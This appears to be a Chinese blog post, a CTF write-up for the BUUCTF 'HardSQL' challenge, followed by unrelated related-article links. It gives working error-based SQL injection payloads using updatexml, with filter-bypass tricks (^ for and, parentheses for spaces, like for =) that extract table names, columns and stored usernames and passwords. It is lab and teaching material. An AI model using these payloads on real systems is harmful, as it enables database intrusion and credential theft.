当前位置: 首页 > news >正文

BUUCTF-web刷题篇(14)

news 来源:原创 2025/6/23 8:55:51

23.HardSQL

万能密码和双写绕过都不起作用,尝试报错注入(datexml和extractvalue两种)

用updatexml试试:

1'or (updatexml(1,concat(0x7e,database(),0x7e),1))or'

发现错误,应该有过滤,经过测试,至少and,空格,等于 等被过滤

那就用^代替and,用()代替空格,like代替=

1'^(updatexml(1,concat(0x7e,database(),0x7e),1))or'

成功爆库,开始爆表

1'^(updatexml(1,(concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek')),0x7e)),1))or'

爆字段

1'^(updatexml(1,(concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like('geek')),0x7e)),1))or'

爆数据

1'^(updatexml(1,(concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1)),0x7e)),1))or'

发现只有一半,因为只能输出32字符,我们可以用right函数来获取后面的字符,right(password,32)(可以换成30,因为后面还有个}和~,32只是因为没有影响就没改)

1'^(updatexml(1,(concat(0x7e,(select(group_concat(right(password,32)))from(geek.H4rDsq1)),0x7e)),1))or'

拼凑即可获得flag

相关文章:

  • 边缘计算革命:低功耗GPU在自动驾驶实时决策中的应用
  • [ctfshow web入门] web25
  • 通过扣子平台将数据写入飞书多维表格
  • rockylinux 8 9 升级到指定版本
  • excel的逻辑类型函数(主要包括if、and、or、not、xor、iserror、iferror、true、false、ifs、ifna、switch)
  • 迁移WordPress网站(大文件版本)
  • 任务扩展-输入商品原价,折扣并计算促销后的价格
  • 二十八- Scala
  • 使用LangChain Agents构建Gradio及Gradio Tools(6)——创建自己的GradioTool
  • 关于软件bug描述
  • 核心案例 | 湖南汽车工程职业大学无人机操控与编队技术实验室
  • 引入模型的知识点整理(Three.js)
  • 阅读笔记“BFMSense”
  • MVS 无监督学习
  • docker各种清空缓存命令,下载jdk包总失败,执行完好了
  • BUUCTF-web刷题篇(15)
  • SeaTunnel系列之:部署SeaTunnel的Spark和Flink引擎
  • 时序数据库 TDengine Cloud 私有连接实战指南:4步实现数据安全传输与成本优化
  • (二)链表结构
  • Redis-一般操作
  • 自己网站视频直播怎么做/广东东莞疫情最新消息
  • 自做网站教程/企业网址搭建
  • 做的比较好的手机网站/谷歌搜索引擎入口2022
  • 如何测试一个网站/北京seo网络优化招聘网
  • 在线做heatmap的网站/一键优化
  • 企业网站一般用什么域名/微信软文是什么